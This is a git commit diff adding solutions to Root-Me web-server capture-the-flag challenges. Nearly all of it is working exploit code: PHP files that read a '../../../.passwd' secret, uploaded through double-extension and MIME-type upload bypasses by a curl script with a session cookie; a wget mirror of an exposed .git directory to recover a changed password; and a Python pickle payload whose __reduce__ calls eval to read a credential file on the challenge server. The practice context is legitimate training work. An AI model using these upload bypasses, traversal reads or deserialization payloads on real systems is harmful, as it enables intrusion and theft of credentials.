Ajout nouveaux challenges

rootme/challenges/web-serveur/file-upload-double-extensions/exploit.php.png

@@ -0,0 +1,5 @@
+<?php
+
+echo file_get_contents("../../../.passwd");
+
+?>

rootme/challenges/web-serveur/file-upload-type-mime/exploit.php

@@ -0,0 +1,5 @@
+<?php
+
+echo file_get_contents("../../../.passwd");
+
+?>

rootme/challenges/web-serveur/file-upload-type-mime/exploit.sh

@@ -0,0 +1,7 @@
+#!/bin/sh
+
+BASEDIR=$(dirname "$0")
+
+curl -X POST --cookie "PHPSESSID=6b8dc1527444202a1b16e9e806ca0ab6" \
+	--form "file=@$BASEDIR/exploit.php;type=image/png" \
+	'http://challenge01.root-me.org/web-serveur/ch21/?action=upload'

rootme/challenges/web-serveur/insecure-code-management/note

@@ -0,0 +1,10 @@
+wget -m --no-parent 'http://challenge01.root-me.org/web-serveur/ch61/.git/'
+
+cd challenge01.root-me.org/web-serveur/ch61
+
+git checkout
+
+git log
+	=> commit a8673b295eca6a4fa820706d5f809f1a8b49fcba Changed password
+
+git show a8673b295eca6a4fa820706d5f809f1a8b49fcba

rootme/challenges/web-serveur/pickle/pickle_hack.py

@@ -0,0 +1,22 @@
+import socket
+import base64
+import pickle
+ 
+host = 'challenge02.root-me.org'
+port = 60005
+ 
+class Exploit(object):
+    def __reduce__(self):
+        return (eval, ('eval(file("/challenge/app-script/ch5/.passwd", "r").read())',))
+ 
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, port))
+obj = Exploit()
+req = '''AUTH admin HTTP/1.0\r\nAuthenticate: %s\r\n\r\n''' % base64.b64encode(pickle.dumps(obj))
+sock.send(req)
+ 
+res = sock.recv(4096)
+while res:
+    print res
+    res = sock.recv(4096)
+